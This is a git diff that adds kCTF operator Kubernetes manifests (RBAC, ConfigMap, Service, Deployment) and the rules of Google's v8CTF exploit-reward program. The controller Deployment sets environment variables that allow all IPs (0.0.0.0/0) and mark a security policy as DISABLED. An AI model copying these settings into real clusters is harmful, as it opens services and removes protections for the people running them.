- list + - patch + - update + - watch +- apiGroups: + - networking.k8s.io + resources: + - networkpolicies + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterrolebindings + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +- apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterroles + verbs: + - create + - delete + - get + - list + - patch + - update + - watch +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: kctf-operator-metrics-reader +rules: +- nonResourceURLs: + - /metrics + verbs: + - get +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: kctf-operator-proxy-role +rules: +- apiGroups: + - authentication.k8s.io + resources: + - tokenreviews + verbs: + - create +- apiGroups: + - authorization.k8s.io + resources: + - subjectaccessreviews + verbs: + - create +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: kctf-operator-leader-election-rolebinding + namespace: kctf-operator-system +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: kctf-operator-leader-election-role +subjects: +- kind: ServiceAccount + name: kctf-operator-controller-manager + namespace: kctf-operator-system +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: kctf-operator-manager-rolebinding +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kctf-operator-manager-role +subjects: +- kind: ServiceAccount + name: kctf-operator-controller-manager + namespace: kctf-operator-system +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: kctf-operator-proxy-rolebinding +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kctf-operator-proxy-role +subjects: +- kind: ServiceAccount + name: kctf-operator-controller-manager + namespace: kctf-operator-system +--- +apiVersion: v1 +data: + controller_manager_config.yaml: | + apiVersion: controller-runtime.sigs.k8s.io/v1alpha1 + kind: ControllerManagerConfig + health: + healthProbeBindAddress: :8081 + metrics: + bindAddress: 127.0.0.1:8080 + webhook: + port: 9443 + leaderElection: + leaderElect: true + resourceName: 558d99b6.dev +kind: ConfigMap +metadata: + name: kctf-operator-manager-config + namespace: kctf-operator-system +--- +apiVersion: v1 +kind: Service +metadata: + labels: + control-plane: controller-manager + name: kctf-operator-controller-manager-metrics-service + namespace: kctf-operator-system +spec: + ports: + - name: https + port: 8443 + protocol: TCP + targetPort: https + selector: + control-plane: controller-manager +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + control-plane: controller-manager + name: kctf-operator-controller-manager + namespace: kctf-operator-system +spec: + replicas: 1 + selector: + matchLabels: + control-plane: controller-manager + template: + metadata: + labels: + control-plane: controller-manager + spec: + containers: + - args: + - --secure-listen-address=0.0.0.0:8443 + - --upstream=http://127.0.0.1:8080/ + - --logtostderr=true + - --v=10 + image: gcr.io/kubebuilder/kube-rbac-proxy:v0.8.0 + name: kube-rbac-proxy + ports: + - containerPort: 8443 + name: https + protocol: TCP + - args: + - --health-probe-bind-address=:8081 + - --metrics-bind-address=127.0.0.1:8080 + - --leader-elect + command: + - /manager + env: + - name: ALLOWED_IPS + value: 0.0.0.0/0 + - name: SECURITY_POLICY + value: DISABLED + image: gcr.io/kctf-docker/kctf-operator@sha256:ad8cf85ab93a9cfbd8fa1ccc221851933a3e6ef554f18041c581b0f72b33cae2 + livenessProbe: + httpGet: + path: /healthz + port: 8081 + initialDelaySeconds: 15 + periodSeconds: 20 + name: manager + readinessProbe: + httpGet: + path: /readyz + port: 8081 + initialDelaySeconds: 5 + periodSeconds: 10 + resources: + limits: + cpu: 200m + memory: 100Mi + requests: + cpu: 100m + memory: 20Mi + securityContext: + allowPrivilegeEscalation: false + securityContext: + runAsNonRoot: true + serviceAccountName: kctf-operator-controller-manager + terminationGracePeriodSeconds: 10 diff --git a/v8ctf/rules.md b/v8ctf/rules.md new file mode 100644 index 00000000..6e54245e --- /dev/null +++ b/v8ctf/rules.md @@ -0,0 +1,41 @@ +# v8CTF Rules + +The v8CTF is a part of the [Google VRP](https://g.co/vrp) in which we reward successful exploitation attempts against a V8 version running on our infrastructure. +This program is orthogonal to the [Chrome VRP](https://g.co/chrome/vrp), if you find a bug and exploit it, you can submit the bug to the Chrome VRP and use the exploit for the v8CTF. + +In the following, we will differentiate between 0-day and n-day exploits. +If the bug that led to the initial memory corruption was found by you, i.e. reported from the same email address as used in the v8CTF submission, we will consider the exploit a 0-day submission. +All other exploits are considered n-day submissions. + +## Rules + +The following rules apply to the eligibility of exploits: +* Your exploit needs to exfiltrate the flag from our v8CTF infrastructure. +* Only the first submission for a given bug that leads to the initial memory corruption is eligible. +* Only the first submission per deployed V8 version in v8CTF is eligible based on the timestamp of the form submission. + * 0-day submissions are exempt from this limit. +* Exploits need to be reasonably fast and stable. We accept submissions with an average runtime of less than 5 minutes and at least 80% success rate. +* Valid submissions get a reward of $10,000. + +## Submission Process + +1. If your exploit targets a 0-day vulnerability, make sure to report it first to the [Chrome VRP](https://g.co/chrome/vrp). +1. Check [this sheet](https://docs.google.com/spreadsheets/d/e/2PACX-1vTWvO0tFNl8fJbOmTV1nwGJi4fAy5pDg-6DsHARRubj8I6c7_11RQ36Jv735zj9EQggz6AWjAOaebJh/pubhtml?gid=0&single=true) if there’s already a submission for the currently deployed V8 version. +1. Exploit the bug and capture the flag from our v8CTF environment. +1. Create a .tar.gz archive of your exploit and calculate its sha256, e.g. with `sha256sum exploit.tar.gz`. + 1. Please double check that the exploit doesn’t have any external dependencies. +1. Fill out [this form](https://docs.google.com/forms/d/e/1FAIpQLScoWE5-XoF85dXMjWKTIrJGTEfCybFaktsYZMCZ86iFPrW8Ew/viewform?usp=header_link) with the flag and the exploit sha256 sum. + 1. For 0-day submissions, please use the same email address you reported the bug from. +1. A bug in the Google Issue Tracker will be filed on your behalf. Attach the exploit matching the sha256 sum and a short write up to the bug. +1. Give us a few days to validate your submission. + +## Setup + +You can find a description of our v8CTF infrastructure in the [README](https://github.com/google/security-research/blob/master/v8ctf/README.md). + +## Communication + +We have two discord channels set up on the [Capture The Flag](https://discord.gg/hqcSdTk6vm) server: + +* #v8ctf-announcements: will be used for announcements such as changes to the rules. +* #v8ctf: is open to all. If you have any questions, please ask here.